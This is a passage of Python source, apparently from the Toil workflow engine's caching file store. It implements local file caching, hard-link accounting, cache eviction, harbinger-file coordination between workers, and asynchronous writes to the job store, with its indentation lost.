# file so other jobs know not to redundantly download the same file. Write
# the PID of this process into the file so other jobs know who is carrying
# out the download.
harbingerFile.write()
# Now release the file lock while the file is downloaded as download could
# take a while.
flock(lockFileHandle, LOCK_UN)
# Use try:finally: so that the .harbinger file is removed whether the
# download succeeds or not.
try:
self.jobStore.readFile(fileStoreID,
'/.'.join(os.path.split(cachedFileName)),
symlink=False)
except:
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.remove('/.'.join(os.path.split(cachedFileName)))
raise
else:
# If the download succeeded, officially add the file to cache (by
# recording it in the cache lock file) if possible.
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.rename('/.'.join(os.path.split(cachedFileName)), cachedFileName)
# If this is not true we get into trouble in our internal reference counting.
assert(os.stat(cachedFileName).st_nlink == self.nlinkThreshold)
self.addToCache(localFilePath, fileStoreID, 'read', mutable)
# We don't need to return the file size here because addToCache
# already does it for us
finally:
# In any case, delete the harbinger file.
harbingerFile.delete()
else:
# Release the cache lock since the remaining stuff is not cache related.
flock(lockFileHandle, LOCK_UN)
self.jobStore.readFile(fileStoreID, localFilePath, symlink=False)
# Make sure we got a file with the number of links we expect.
# If this is not true we get into trouble in our internal reference counting.
assert(os.stat(localFilePath).st_nlink == self.nlinkThreshold)
os.chmod(localFilePath, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Now that we have the file, we have 2 options. It's modifiable or not.
# Either way, we need to account for FileJobStore making links instead of
# copies.
if mutable:
if self.nlinkThreshold == 2:
# nlinkThreshold can only be 1 or 2 and it can only be 2 iff the
# job store is FilejobStore, and the job store and local temp dir
# are on the same device. An atomic rename removes the nlink on the
# file handle linked from the job store.
shutil.copyfile(localFilePath, localFilePath + '.tmp')
os.rename(localFilePath + '.tmp', localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
-1, False)
# If it was immutable
else:
if self.nlinkThreshold == 2:
self._accountForNlinkEquals2(localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
0.0, False)
return localFilePath
def exportFile(self, jobStoreFileID, dstUrl):
while jobStoreFileID in self._pendingFileWrites:
# The file is still being written to the job store - wait for the write to finish
# before exporting it
time.sleep(1)
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def readGlobalFileStream(self, fileStoreID):
if fileStoreID in self.filesToDelete:
raise RuntimeError(
"Trying to access a file in the jobStore you've deleted: %s" % fileStoreID)
# If fileStoreID is in the cache provide a handle from the local cache
if self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
return open(self.encodedFileID(fileStoreID), 'rb')
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
# The local file may or may not have been cached. If it was, we need to do some
# bookkeeping; if it wasn't, we just delete the file and continue, though bookkeeping
# may still be needed if the file store and cache live on the same filesystem. We can
# know whether a file was cached based on the value held in the third tuple value for
# the dict item having key = fileStoreID: if it was cached, it holds the value True,
# else False.
with self._CacheState.open(self) as cacheInfo:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
if fileStoreID not in list(jobState.jobSpecificFiles.keys()):
# ENOENT indicates that the file did not exist
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
# filesToDelete is a dictionary of file: fileSize
filesToDelete = jobState.jobSpecificFiles[fileStoreID]
allOwnedFiles = jobState.filesToFSIDs
for (fileToDelete, fileSize) in list(filesToDelete.items()):
# Handle the case where a file not in the local temp dir was written to
# filestore
if fileToDelete is None:
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If the file size is zero (copied into the local temp dir) or -1 (mutable), we
# can safely delete without any bookkeeping
if fileSize in (0, -1):
# Only remove the file if there is only one FSID associated with it.
if len(allOwnedFiles[fileToDelete]) == 1:
try:
os.remove(fileToDelete)
except OSError as err:
if err.errno == errno.ENOENT and fileSize == -1:
logger.debug('%s was read mutably and deleted by the user',
fileToDelete)
else:
raise IllegalDeletionCacheError(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
filesToDelete.pop(fileToDelete)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If not, we need to do bookkeeping
# Get the size of the file to be deleted, and the number of jobs using the file
# at the moment.
if not os.path.exists(fileToDelete):
raise IllegalDeletionCacheError(fileToDelete)
fileStats = os.stat(fileToDelete)
if fileSize != fileStats.st_size:
logger.warn("the size on record differed from the real size by " +
"%s bytes" % str(fileSize - fileStats.st_size))
# Remove the file and return file size to the job
if len(allOwnedFiles[fileToDelete]) == 1:
os.remove(fileToDelete)
cacheInfo.sigmaJob += fileSize
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
jobState.updateJobReqs(fileSize, 'remove')
cacheInfo.jobState[self.jobID] = jobState.__dict__
# If the job is not in the process of cleaning up, then we may need to remove the
# cached copy of the file as well.
if not self.cleanupInProgress:
# If the file is cached and if other jobs are using the cached copy of the file,
# or if retaining the file in the cache doesn't affect the cache equation, then
# don't remove it from cache.
if self._fileIsCached(fileStoreID):
cachedFile = self.encodedFileID(fileStoreID)
jobsUsingFile = os.stat(cachedFile).st_nlink
if not cacheInfo.isBalanced() and jobsUsingFile == self.nlinkThreshold:
os.remove(cachedFile)
cacheInfo.cached -= fileSize
self.logToMaster('Successfully deleted cached copy of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
self.logToMaster('Successfully deleted local copies of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
def deleteGlobalFile(self, fileStoreID):
jobStateIsPopulated = False
with self._CacheState.open(self) as cacheInfo:
if self.jobID in cacheInfo.jobState:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobStateIsPopulated = True
if jobStateIsPopulated and fileStoreID in list(jobState.jobSpecificFiles.keys()):
# Use deleteLocalFile in the backend to delete the local copy of the file.
self.deleteLocalFile(fileStoreID)
# At this point, the local file has been deleted, and possibly the cached copy. If
# the cached copy exists, it is either because another job is using the file, or
# because retaining the file in cache doesn't unbalance the caching equation. The
# first case is unacceptable for deleteGlobalFile and the second requires explicit
# deletion of the cached copy.
# Check if the fileStoreID is in the cache. If it is, ensure only the current job is
# using it.
cachedFile = self.encodedFileID(fileStoreID)
if os.path.exists(cachedFile):
self.removeSingleCachedFile(fileStoreID)
# Add the file to the list of files to be deleted once the run method completes.
self.filesToDelete.add(fileStoreID)
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
# Cache related methods
@contextmanager
def cacheLock(self):
"""
This is a context manager to acquire a lock on the lock file that will be used to
prevent concurrent cache operations between workers.
:yields: File handle for the cache lock file, opened in 'w' mode
"""
cacheLockFile = open(self.cacheLockFile, 'w')
try:
flock(cacheLockFile, LOCK_EX)
logger.debug("CACHE: Obtained lock on file %s" % self.cacheLockFile)
yield cacheLockFile
except IOError:
logger.critical('CACHE: Unable to acquire lock on %s' % self.cacheLockFile)
raise
finally:
cacheLockFile.close()
logger.debug("CACHE: Released lock")
def _setupCache(self):
"""
Setup the cache based on the provided values for localCacheDir.
"""
# we first check whether the cache directory exists. If it doesn't, create it.
if not os.path.exists(self.localCacheDir):
# Create a temporary directory as this worker's private cache. If all goes well, it
# will be renamed into the cache for this node.
personalCacheDir = ''.join([os.path.dirname(self.localCacheDir), '/.ctmp-',
str(uuid.uuid4())])
os.mkdir(personalCacheDir, 0o755)
self._createCacheLockFile(personalCacheDir)
try:
os.rename(personalCacheDir, self.localCacheDir)
except OSError as err:
# The only acceptable FAIL case is that the destination is a non-empty
# directory. Assuming (it's ambiguous) atomic renaming of directories, if the
# dst is non-empty, it only means that another worker has beaten this one to the
# rename.
if err.errno == errno.ENOTEMPTY:
# Cleanup your own mess. It's only polite.
shutil.rmtree(personalCacheDir)
else:
raise
# You can't reach here unless a local cache directory has been created successfully
with self._CacheState.open(self) as cacheInfo:
# Ensure this cache is from the correct attempt at the workflow! If it isn't, we
# need to reset the cache lock file
if cacheInfo.attemptNumber != self.workflowAttemptNumber:
if cacheInfo.nlink == 2:
cacheInfo.cached = 0 # cached file sizes are accounted for by job store
else:
allCachedFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
cacheInfo.cached = sum([os.stat(cachedFile).st_size
for cachedFile in allCachedFiles])
# TODO: Delete the working directories
cacheInfo.sigmaJob = 0
cacheInfo.attemptNumber = self.workflowAttemptNumber
self.nlinkThreshold = cacheInfo.nlink
def _createCacheLockFile(self, tempCacheDir):
"""
Create the cache lock file and the cache state file that records the state of the cache on the node.
:param str tempCacheDir: Temporary directory to use for setting up a cache lock file the
first time.
"""
# The nlink threshold is set up along with the first instance of the cache class on the
# node. It needs the cache dir to sniff the link count for files from the job store.
self.setNlinkThreshold(tempCacheDir)
# Get the free space on the device
freeSpace, _ = getFileSystemSize(tempCacheDir)
# Create the cache lock file.
open(os.path.join(tempCacheDir, os.path.basename(self.cacheLockFile)), 'w').close()
# Setup the cache state file
personalCacheStateFile = os.path.join(tempCacheDir,
os.path.basename(self.cacheStateFile))
# Setup the initial values for the cache state file in a dict
cacheInfo = self._CacheState({
'nlink': self.nlinkThreshold,
'attemptNumber': self.workflowAttemptNumber,
'total': freeSpace,
'cached': 0,
'sigmaJob': 0,
'cacheDir': self.localCacheDir,
'jobState': {}})
cacheInfo.write(personalCacheStateFile)
def encodedFileID(self, jobStoreFileID):
"""
Uses a URL-safe base64 encoding to encode the jobStoreFileID into a unique identifier to
use as a filename within the cache folder. Job store IDs are essentially URLs/paths to
files and thus cannot be used as-is. Base64 encoding is used since it is reversible.
:param jobStoreFileID: string representing a job store file ID
:return: outCachedFile: A path to the encoded file name in localCacheDir
:rtype: str
"""
base64Text = base64.urlsafe_b64encode(jobStoreFileID.encode('utf-8')).decode('utf-8')
outCachedFile = os.path.join(self.localCacheDir, base64Text)
return outCachedFile
def _fileIsCached(self, jobStoreFileID):
"""
Is the file identified by jobStoreFileID in cache or not.
"""
return os.path.exists(self.encodedFileID(jobStoreFileID))
def decodedFileID(self, cachedFilePath):
"""
Decode a cached fileName back to a job store file ID.
:param str cachedFilePath: Path to the cached file
:return: The jobstore file ID associated with the file
:rtype: str
"""
fileDir, fileName = os.path.split(cachedFilePath)
assert fileDir == self.localCacheDir, 'Can\'t decode uncached file names'
# We encode and decode here because base64 can't work with unencoded text.
# It's probably worth, later, converting all file name variables to bytes
# and not text.
return base64.urlsafe_b64decode(fileName.encode('utf-8')).decode('utf-8')
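# Illustrative round trip (assumption; 'files/for-job/xyz' is a made-up ID): the encode/
# decode pair is a plain reversible URL-safe base64 mapping over the file ID string.
#
#   fid = 'files/for-job/xyz'
#   name = base64.urlsafe_b64encode(fid.encode('utf-8')).decode('utf-8')
#   assert base64.urlsafe_b64decode(name.encode('utf-8')).decode('utf-8') == fid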
def addToCache(self, localFilePath, jobStoreFileID, callingFunc, mutable=False):
"""
Used to process the caching of a file. This depends on whether a file is being written
to file store, or read from it.
WRITING
The file is in localTempDir. It needs to be linked into cache if possible.
READING
The file is already in the cache dir. Depending on whether it is modifiable or not, it
either needs to be linked to the required location or copied there. If it is copied,
whether the file can still be retained in the cache depends on the caching equation.
:param str localFilePath: Path to the Source file
:param jobStoreFileID: jobStoreID for the file
:param str callingFunc: Who called this function, 'write' or 'read'
:param bool mutable: See modifiable in readGlobalFile
"""
assert callingFunc in ('read', 'write')
with self.cacheLock() as lockFileHandle:
cachedFile = self.encodedFileID(jobStoreFileID)
# The file to be cached MUST originate in the environment of the TOIL temp directory
if (os.stat(self.localCacheDir).st_dev !=
os.stat(os.path.dirname(localFilePath)).st_dev):
raise InvalidSourceCacheError('Attempting to cache a file across file systems '
'cachedir = %s, file = %s.' % (self.localCacheDir,
localFilePath))
if not localFilePath.startswith(self.localTempDir):
raise InvalidSourceCacheError('Attempting a cache operation on a non-local file '
'%s.' % localFilePath)
if callingFunc == 'read' and mutable:
shutil.copyfile(cachedFile, localFilePath)
fileSize = os.stat(cachedFile).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
cacheInfo.cached += fileSize if cacheInfo.nlink != 2 else 0
if not cacheInfo.isBalanced():
os.remove(cachedFile)
cacheInfo.cached -= fileSize if cacheInfo.nlink != 2 else 0
logger.debug('Could not both download ' +
'%s as mutable and add it to the ' % os.path.basename(localFilePath) +
'cache. Hence only the mutable copy was retained.')
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, localFilePath, -1, False)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
# There are two possibilities, read and immutable, and write. both cases do
# almost the same thing except for the direction of the os.link hence we're
# writing them together.
if callingFunc == 'read': # and mutable is inherently False
src = cachedFile
dest = localFilePath
# To mirror behaviour of shutil.copyfile
if os.path.exists(dest):
os.remove(dest)
else: # write
src = localFilePath
dest = cachedFile
try:
os.link(src, dest)
except OSError as err:
if err.errno != errno.EEXIST:
raise
# If we get the EEXIST error, it can only be from write since in read we are
# explicitly deleting the file. This shouldn't happen with the .partial
# logic hence we raise a cache error.
raise CacheError('Attempting to recache a file %s.' % src)
else:
# Chmod the cached file. Cached files can never be modified.
os.chmod(cachedFile, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Return the filesize of cachedFile to the job and increase the cached size
# The values passed here don't matter since rFS looks at the file only for
# the stat
self.returnFileSize(jobStoreFileID, localFilePath, lockFileHandle,
fileAlreadyCached=False)
if callingFunc == 'read':
logger.debug('CACHE: Read file with ID \'%s\' from the cache.' %
jobStoreFileID)
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
def returnFileSize(self, fileStoreID, cachedFileSource, lockFileHandle,
fileAlreadyCached=False):
"""
Returns the fileSize of the file described by fileStoreID to the job requirements pool
if the file was recently added to, or read from, the cache (a job that reads n bytes from
cache doesn't really use those n bytes as a part of its job disk, since the cache is
already accounting for that disk space).
:param fileStoreID: fileStore ID of the file being added to cache
:param str cachedFileSource: File being added to cache
:param file lockFileHandle: Open file handle to the cache lock file
:param bool fileAlreadyCached: A flag to indicate whether the file was already cached or
not. If it was, then it means that you don't need to add the filesize to cache again.
"""
fileSize = os.stat(cachedFileSource).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
# If the file isn't cached, add the size of the file to the cache pool. However, if the
# nlink threshold is not 1 - i.e. it is 2 (it can only be 1 or 2), then don't do this
# since the size of the file is accounted for by the file store copy.
if not fileAlreadyCached and self.nlinkThreshold == 1:
cacheInfo.cached += fileSize
cacheInfo.sigmaJob -= fileSize
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on returning file size',
logging.WARN)
# Add the info to the job specific cache info
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, cachedFileSource, fileSize, True)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
@staticmethod
def _isHidden(filePath):
"""
This is a function that checks whether filePath is hidden
:param str filePath: Path to the file under consideration
:return: A boolean indicating whether the file is hidden or not.
:rtype: bool
"""
assert isinstance(filePath, (str, bytes))
# I can safely assume I will never see an empty string because this is always called on
# the results of an os.listdir()
return filePath[0] in ('.', '_')
def cleanCache(self, newJobReqs):
"""
Clean up files in the cache directory to ensure that at least newJobReqs bytes are available
for use.
:param float newJobReqs: the disk space (in bytes) requested by the incoming job.
"""
with self._CacheState.open(self) as cacheInfo:
# Add the new job's disk requirements to the sigmaJobDisk variable
cacheInfo.sigmaJob += newJobReqs
# Initialize the job state here. we use a partial in the jobSpecificFiles call so
# that this entire thing is pickleable. Based on answer by user Nathaniel Gentile at
# http://stackoverflow.com/questions/2600790
assert self.jobID not in cacheInfo.jobState
cacheInfo.jobState[self.jobID] = {
'jobName': self.jobName,
'jobReqs': newJobReqs,
'jobDir': self.localTempDir,
'jobSpecificFiles': defaultdict(partial(defaultdict,int)),
'filesToFSIDs': defaultdict(set),
'pid': os.getpid(),
'deferredFunctions': []}
# If the caching equation is balanced, do nothing.
if cacheInfo.isBalanced():
return None
# List of deletable cached files. A deletable cache file is one
# that is not in use by any other worker (identified by the number of hard links to
# the file).
allCacheFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
allCacheFiles = [(path, os.stat(path)) for path in allCacheFiles]
# TODO mtime vs ctime
deletableCacheFiles = {(path, inode.st_mtime, inode.st_size)
for path, inode in allCacheFiles
if inode.st_nlink == self.nlinkThreshold}
# Sort in descending order of mtime so the first items to be popped from the list
# are the least recently created.
deletableCacheFiles = sorted(deletableCacheFiles, key=lambda x: (-x[1], -x[2]))
logger.debug('CACHE: Need %s bytes for new job. Detecting an estimated %s (out of a '
'total %s) bytes available for running the new job. The size of the cache '
'is %s bytes.', newJobReqs,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)),
cacheInfo.total, cacheInfo.cached)
logger.debug('CACHE: Evicting files to make room for the new job.')
# Now do the actual file removal
totalEvicted = 0
while not cacheInfo.isBalanced() and len(deletableCacheFiles) > 0:
cachedFile, fileCreateTime, cachedFileSize = deletableCacheFiles.pop()
os.remove(cachedFile)
cacheInfo.cached -= cachedFileSize if self.nlinkThreshold != 2 else 0
totalEvicted += cachedFileSize
assert cacheInfo.cached >= 0
logger.debug('CACHE: Evicted file with ID \'%s\' (%s bytes)' %
(self.decodedFileID(cachedFile), cachedFileSize))
logger.debug('CACHE: Evicted a total of %s bytes. Available space is now %s bytes.',
totalEvicted,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)))
if not cacheInfo.isBalanced():
raise CacheUnbalancedError()
def removeSingleCachedFile(self, fileStoreID):
"""
Removes a single file described by the fileStoreID from the cache forcibly.
"""
with self._CacheState.open(self) as cacheInfo:
cachedFile = self.encodedFileID(fileStoreID)
cachedFileStats = os.stat(cachedFile)
# We know the file exists because this function was called in the if block. So we
# have to ensure nothing has changed since then.
assert cachedFileStats.st_nlink <= self.nlinkThreshold, \
'Attempting to delete a global file that is in use by another job.'
assert cachedFileStats.st_nlink >= self.nlinkThreshold, \
'A global file has too FEW links at deletion time. Our link threshold is incorrect!'
# Remove the file size from the cached file size if the jobstore is not fileJobStore
# and then delete the file
os.remove(cachedFile)
if self.nlinkThreshold != 2:
cacheInfo.cached -= cachedFileStats.st_size
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on removing single file',
logging.WARN)
self.logToMaster('CACHE: Successfully removed file with ID \'%s\'.' % fileStoreID)
return None
def setNlinkThreshold(self, tempCacheDir):
# FIXME Can't do this at the top because of loopy (circular) import errors
# We can't predict in advance whether the job store will give us hard links or not.
# Even if the devices appear the same, the only way to know for sure is to try it.
from toil.jobStores.fileJobStore import FileJobStore
if isinstance(self.jobStore, FileJobStore):
# A bunch of code depends on nlinkThreshold==2 -> jobStore is FileJobStore.
# So only do this check if the job store is the file job store.
# Create an empty file.
emptyID = self.jobStore.getEmptyFileStoreID()
# Read it out.
# We have exclusive ownership of tempCacheDir at this point, so we
# can just write any name in there.
cachedFile = os.path.join(tempCacheDir, 'sniffLinkCount')
self.jobStore.readFile(emptyID, cachedFile, symlink=False)
# Check the link count
self.nlinkThreshold = os.stat(cachedFile).st_nlink
# Only 1 or 2 is allowed.
assert(self.nlinkThreshold == 1 or self.nlinkThreshold == 2)
# Clean up
os.unlink(cachedFile)
self.jobStore.deleteFile(emptyID)
else:
# Unless we are on the file job store, we need to have a link count threshold of 1.
# TODO: This relies on something the job store interface doesn't actually guarantee!
self.nlinkThreshold = 1
def _accountForNlinkEquals2(self, localFilePath):
"""
This is a utility function that accounts for the fact that if nlinkThreshold == 2, the
size of the file is accounted for by the file store copy of the file and thus the file
size shouldn't be added to the cached file sizes.
:param str localFilePath: Path to the local file that was linked to the file store copy.
"""
fileStats = os.stat(localFilePath)
assert fileStats.st_nlink >= self.nlinkThreshold
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= fileStats.st_size
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.updateJobReqs(fileStats.st_size, 'remove')
def returnJobReqs(self, jobReqs):
"""
This function returns the effective job requirements back to the pool after the job
completes. It also deletes the local copies of files with the cache lock held.
:param float jobReqs: Original size requirement of the job
"""
# Since we are only reading this job's specific values from the state file, we don't
# need a lock
jobState = self._JobState(self._CacheState._load(self.cacheStateFile
).jobState[self.jobID])
for x in list(jobState.jobSpecificFiles.keys()):
self.deleteLocalFile(x)
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= jobReqs
# assert cacheInfo.isBalanced() # commenting this out for now. God speed
class _CacheState(FileStore._StateFile):
"""
Utility class to read and write the cache state file. Also for checking whether the
caching equation is balanced or not. It extends the _StateFile class to add other cache
related functions.
"""
@classmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that opens the cache state file and reads it into an object
that is returned to the user in the yield
"""
assert outer is not None
with outer.cacheLock():
cacheInfo = cls._load(outer.cacheStateFile)
yield cacheInfo
cacheInfo.write(outer.cacheStateFile)
def isBalanced(self):
"""
Checks for the inequality of the caching equation, i.e.
cachedSpace + sigmaJobDisk <= totalFreeSpace
Essentially, the sum of all cached file + disk requirements of all running jobs
should always be less than the available space on the system
:return: Boolean for equation is balanced (T) or not (F)
:rtype: bool
"""
return self.cached + self.sigmaJob <= self.total
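# Worked example (illustrative numbers only): with total = 100 GiB of free space,
# cached = 30 GiB of cached files and sigmaJob = 60 GiB of outstanding job disk
# requests, 30 + 60 <= 100 holds and the cache is balanced. A new job that pushes
# sigmaJob to 80 GiB would break the inequality, and cleanCache() would have to evict
# cached files until it holds again.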
def purgeRequired(self, jobReqs):
"""
Similar to isBalanced, however it looks at the actual state of the system and
decides whether an eviction is required.
:return: Is a purge required(T) or no(F)
:rtype: bool
"""
return not self.isBalanced()
# totalStats = os.statvfs(self.cacheDir)
# totalFree = totalStats.f_bavail * totalStats.f_frsize
# return totalFree < jobReqs
# Methods related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
:param toil.fileStore.CachingFileStore._CacheState nodeInfo: The state of the node cache as
a _CacheState object
"""
# A list of tuples of (hashed job id, pid or process running job)
registeredJobs = [(jid, state['pid']) for jid, state in list(nodeInfo.jobState.items())]
for jobID, jobPID in registeredJobs:
if not cls._pidExists(jobPID):
jobState = CachingFileStore._JobState(nodeInfo.jobState[jobID])
logger.warning('Detected that job (%s) prematurely terminated. Fixing the state '
'of the cache.', jobState.jobName)
if not batchSystemShutdown:
logger.debug("Returning dead job's used disk to cache.")
# Delete the old work directory if it still exists, to remove unwanted nlinks.
# Do this only during the life of the program and don't do it during the
# batch system cleanup. Leave that to the batch system cleanup code.
if os.path.exists(jobState.jobDir):
shutil.rmtree(jobState.jobDir)
nodeInfo.sigmaJob -= jobState.jobReqs
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState.deferredFunctions)
# Remove job from the cache state file
nodeInfo.jobState.pop(jobID)
def _registerDeferredFunction(self, deferredFunction):
with self._CacheState.open(self) as cacheInfo:
cacheInfo.jobState[self.jobID]['deferredFunctions'].append(deferredFunction)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
class _JobState(object):
"""
This is a utility class to handle the state of a job in terms of its current disk
requirements, working directory, and job specific files.
"""
def __init__(self, dictObj):
assert isinstance(dictObj, dict)
self.__dict__.update(dictObj)
@classmethod
def updateJobSpecificFiles(cls, outer, jobStoreFileID, filePath, fileSize, cached):
"""
This method will update the job specific files in the job state object. It deals with
opening a cache lock file, etc.
:param toil.fileStore.CachingFileStore outer: An instance of CachingFileStore
:param str jobStoreFileID: job store Identifier for the file
:param str filePath: The path to the file
:param float fileSize: The size of the file (may be deprecated soon)
:param bool cached: T : F : None :: cached : not cached : mutably read
"""
with outer._CacheState.open(outer) as cacheInfo:
jobState = cls(cacheInfo.jobState[outer.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, filePath, fileSize, cached)
cacheInfo.jobState[outer.jobID] = jobState.__dict__
def addToJobSpecFiles(self, jobStoreFileID, filePath, fileSize, cached):
"""
This is the method that actually performs the updates.
:param jobStoreFileID: job store Identifier for the file
:param filePath: The path to the file
:param fileSize: The size of the file (may be deprecated soon)
:param cached: T : F : None :: cached : not cached : mutably read
"""
# If there is no entry for the jsfID, make one. self.jobSpecificFiles is a default
# dict of default dicts and the absence of a key will return an empty dict
# (equivalent to a None for the if)
if not self.jobSpecificFiles[jobStoreFileID]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
else:
# If there's no entry for the filepath, create one
if not self.jobSpecificFiles[jobStoreFileID][filePath]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
# This should never happen
else:
raise RuntimeError()
# Now add the file to the reverse mapper. This will speed up cleanup and local file
# deletion.
self.filesToFSIDs[filePath].add(jobStoreFileID)
if cached:
self.updateJobReqs(fileSize, 'add')
def updateJobReqs(self, fileSize, actions):
"""
This method will update the current state of the disk required by the job after the
most recent cache operation.
:param fileSize: Size of the last file added/removed from the cache
:param actions: 'add' or 'remove'
"""
assert actions in ('add', 'remove')
multiplier = 1 if actions == 'add' else -1
# If the file was added to the cache, the value is subtracted from the requirements,
# and it is added back if the file was removed from the cache.
self.jobReqs -= (fileSize * multiplier)
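# Illustrative example (made-up size): caching a 5 GiB file ('add') subtracts 5 GiB from
# jobReqs, because the cache now accounts for that disk; evicting it ('remove') adds the
# 5 GiB back to the job's own requirement.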
def isPopulated(self):
return self.__dict__ != {}
class HarbingerFile(object):
"""
Represents the placeholder file that heralds the arrival of a local copy of a file in
the job store.
"""
def __init__(self, fileStore, fileStoreID=None, cachedFileName=None):
"""
Returns the harbinger file name for a cached file, or for a job store ID
:param class fileStore: The 'self' object of the fileStore class
:param str fileStoreID: The file store ID for an input file
:param str cachedFileName: The cache file name corresponding to a given file
"""
# We need either a file store ID, or a cached file name, but not both (XOR).
assert (fileStoreID is None) != (cachedFileName is None)
if fileStoreID is not None:
self.fileStoreID = fileStoreID
cachedFileName = fileStore.encodedFileID(fileStoreID)
else:
self.fileStoreID = fileStore.decodedFileID(cachedFileName)
self.fileStore = fileStore
self.harbingerFileName = '/.'.join(os.path.split(cachedFileName)) + '.harbinger'
def write(self):
self.fileStore.logToMaster('CACHE: Creating a harbinger file for (%s). '
% self.fileStoreID, logging.DEBUG)
with open(self.harbingerFileName + '.tmp', 'w') as harbingerFile:
harbingerFile.write(str(os.getpid()))
# Make this File read only to prevent overwrites
os.chmod(self.harbingerFileName + '.tmp', 0o444)
os.rename(self.harbingerFileName + '.tmp', self.harbingerFileName)
def waitOnDownload(self, lockFileHandle):
"""
This method is called when a readGlobalFile process is waiting on another process to
write a file to the cache.
:param lockFileHandle: The open handle to the cache lock file
"""
while self.exists():
logger.debug('CACHE: Waiting for another worker to download file with ID %s.'
% self.fileStoreID)
# Ensure that the process downloading the file is still alive. The PID will
# be in the harbinger file.
pid = self.read()
if FileStore._pidExists(pid):
# Release the file lock and then wait for a bit before repeating.
flock(lockFileHandle, LOCK_UN)
time.sleep(20)
# Grab the file lock before repeating.
flock(lockFileHandle, LOCK_EX)
else:
# The process that was supposed to download the file has died so we need
# to remove the harbinger.
self._delete()
def read(self):
return int(open(self.harbingerFileName).read())
def exists(self):
return os.path.exists(self.harbingerFileName)
def delete(self):
"""
Acquires the cache lock then attempts to delete the harbinger file.
"""
with self.fileStore.cacheLock():
self._delete()
def _delete(self):
"""
This function assumes you already have the cache lock!
"""
assert self.exists()
self.fileStore.logToMaster('CACHE: Deleting the harbinger file for (%s)' %
self.fileStoreID, logging.DEBUG)
os.remove(self.harbingerFileName)
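# Illustrative sketch of the protocol (assumption, not original code), from a reader's
# point of view while holding the cache lock handle `lockFileHandle`; `someFileStoreID`
# is hypothetical:
#
#   hb = self.HarbingerFile(self, fileStoreID=someFileStoreID)
#   if hb.exists():                        # another worker is downloading the file
#       hb.waitOnDownload(lockFileHandle)  # poll until the harbinger disappears
#   # the cached copy is now either present (download finished) or absent (it failed),
#   # which is why readGlobalFile simply retries itself at this point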
# Functions related to async updates
def asyncWrite(self):
"""
A function to write files asynchronously to the job store such that subsequent jobs are
not delayed by a long write operation.
"""
try:
while True:
try:
# Block for up to two seconds waiting for a file
args = self.queue.get(timeout=2)
except Empty:
# Check if termination event is signaled
# (set in the event of an exception in the worker)
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting")
continue
# Normal termination condition is getting None from queue
if args is None:
break
inputFileHandle, jobStoreFileID = args
cachedFileName = self.encodedFileID(jobStoreFileID)
# Ensure that the harbinger exists in the cache directory and that the PID
# matches that of this writing thread.
# If asyncWrite is ported to subprocesses instead of threads in the future,
# insert logic here to securely overwrite the harbinger file.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
assert harbingerFile.exists()
assert harbingerFile.read() == int(os.getpid())
# We pass in a fileHandle, rather than the file-name, in case
# the file itself is deleted. The fileHandle itself should persist
# while we maintain the open file handle
with self.jobStore.updateFileStream(jobStoreFileID) as outputFileHandle:
shutil.copyfileobj(inputFileHandle, outputFileHandle)
inputFileHandle.close()
# Remove the file from the lock files
with self._pendingFileWritesLock:
self._pendingFileWrites.remove(jobStoreFileID)
